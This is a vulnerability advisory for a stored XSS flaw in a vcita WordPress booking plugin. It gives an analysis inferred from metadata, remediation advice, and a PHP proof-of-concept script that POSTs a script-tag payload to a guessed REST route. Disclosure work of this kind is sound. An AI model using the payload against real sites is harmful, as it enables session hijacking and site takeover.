Published : August 14, 2026

CVE-2026-14433: Online Booking & Scheduling Calendar for WordPress by vcita <= 4.6.0 Unauthenticated Stored Cross-Site Scripting via REST API 'business_id' Parameter PoC, Patch Analysis & Rule

Severity High (CVSS 7.2)
CWE 79
Vulnerable Version 4.6.0
Patched Version
Disclosed August 13, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-14433 (metadata-based): This vulnerability is an unauthenticated stored Cross-Site Scripting (XSS) flaw in the Online Booking & Scheduling Calendar for WordPress by vcita plugin, versions up to and including 4.6.0. The issue exists in the REST API’s handling of the ‘business_id’ parameter, which lacks adequate input sanitization and output escaping. According to the CVSS vector (7.2, AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N), an unauthenticated attacker can remotely inject arbitrary web scripts that execute when any user, including administrators, views an affected page. This is a high-severity vulnerability when considering a WordPress admin context.

Root Cause: The vulnerability stems from improper neutralization of user-supplied input during web page generation, classified as CWE-79. Atomic Edge research infers that the plugin registers a REST API endpoint (likely under a namespace like ‘vcita’ or ‘meeting-scheduler-by-vcita’) that accepts a ‘business_id’ parameter from unauthenticated requests. The plugin likely does not apply sufficient sanitization (e.g., sanitize_text_field or sanitize_html_class) before storing the value, and does not escape it properly when rendering in the page (e.g., esc_html, esc_attr, wp_kses). As a result, an attacker can submit a crafted payload containing HTML/JavaScript through the ‘business_id’ parameter, which gets saved in the site’s options or post meta and later output without proper escaping. This conclusion is inferred from the CVE description and CWE classification, not confirmed from a source code diff, as the plugin is not available for download from wordpress.org.

Exploitation: An attacker exploits this by sending a crafted HTTP request to the plugin’s REST API endpoint. The exact REST route is not fully disclosed, but Atomic Edge research estimates a likely pattern: /wp-json/vcita/v1/settings or /wp-json/meeting-scheduler-by-vcita/v1/business_id. The vulnerable parameter is ‘business_id’. An attacker sends a POST or PUT request containing a payload like ‘alert(document.cookie)’ or an HTML-encoded variant as the value of ‘business_id’. Because the endpoint lacks authentication and CSRF protections (since it is REST API and stores the value), the attacker can execute this request without a nonce. Upon successful injection, the malicious script is stored in the database and rendered in pages where the plugin displays business details, such as the booking calendar or admin dashboard. The script executes in the context of the logged-in user’s session, leading to potential session hijacking or admin-level actions.

Remediation: The fix requires implementing proper input sanitization and output escaping throughout the plugin’s REST API handling and rendering logic. Specifically, the plugin should use WordPress sanitization functions like sanitize_text_field() or esc_url_raw() on the ‘business_id’ parameter before saving it. When outputting the value in HTML contexts, the plugin must use escaping functions such as esc_html(), esc_attr(), or wp_kses() to prevent HTML and JavaScript from being interpreted. If the plugin stores the value in a database table, it should also ensure that all database queries use prepared statements. Additionally, the plugin should implement capability checks and nonce verification for all REST API endpoints to prevent unauthenticated data modification, even though the primary vulnerability is XSS. Until a patched version is released, site owners should consider using a WAF rule or disabling the plugin’s REST API endpoints.

Impact: Successful exploitation allows unauthenticated attackers to inject arbitrary JavaScript into pages rendered by the plugin. When an administrator views the infected page, the attacker can steal session cookies, perform actions on behalf of the admin (such as creating rogue admin users or modifying site content), or redirect users to malicious domains. The stored nature of the attack makes it persistent, affecting all visitors who view the page. The CVSS score of 7.2 reflects the high availability of the attack (network, low complexity, no privileges required) and its potential to compromise the integrity and confidentiality of the site, though direct data exfiltration is limited by the low confidentiality and integrity impact ratings.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-14433 - Online Booking & Scheduling Calendar for WordPress by vcita <= 4.6.0 - Unauthenticated Stored Cross-Site Scripting via REST API 'business_id' Parameter

/**
 * PoC: Exploit CVE-2026-14433 (metadata-based)
 * Sends an unauthenticated REST API request to inject a stored XSS payload in the 'business_id' parameter.
 * The exact REST route is inferred; adjust $api_base and $endpoint if needed.
 */

$target_url = 'http://example.com'; // Change this to the victim WordPress site URL
$api_base = rtrim($target_url, '/') . '/wp-json/';
$endpoint = 'vcita/v1/settings'; // Likely endpoint; may be 'meeting-scheduler-by-vcita/v1/settings'
$full_url = $api_base . $endpoint;

// XSS payload that executes JavaScript when rendered without output escaping
$payload = '<script>alert("XSS");</script>';

// Initialize cURL session
$ch = curl_init($full_url);

// Set cURL options for a POST request with JSON body
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(['business_id' => $payload]));
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'Accept: application/json'
]);

// Execute the request and capture response
$response = curl_exec($ch);
$http_status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output the result for debugging
if ($http_status === 200 || $http_status === 201) {
    echo "[+] Payload likely injected. HTTP status: $http_statusn";
    echo "[+] Response: $responsen";
} else {
    echo "[-] Request failed. HTTP status: $http_statusn";
    echo "[-] Response: $responsen";
}

// Note: If the endpoint does not exist or requires different HTTP methods (e.g., PUT), adjust accordingly.
// Try common alternatives: /wp-json/vcita/v1/store, /wp-json/meeting-scheduler-by-vcita/v1/setup
?>

Frequently Asked Questions

Atomic Edge WAF security layer inspecting website traffic.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Black & McDonald logo representing Enterprise tier security and support for Atomic Edge WAF.Covenant House Toronto logo featuring a dove and text for Atomic Edge Enterprise planAlzheimer Society Canada logo representing trusted organizations and security partners.University of Toronto logo representing trusted organizations using Atomic Edge WAFSpecsavvers logo, trusted developers and organizations using Atomic Edge securityHarvard Medical School logo representing trusted organizations using Atomic Edge WAF.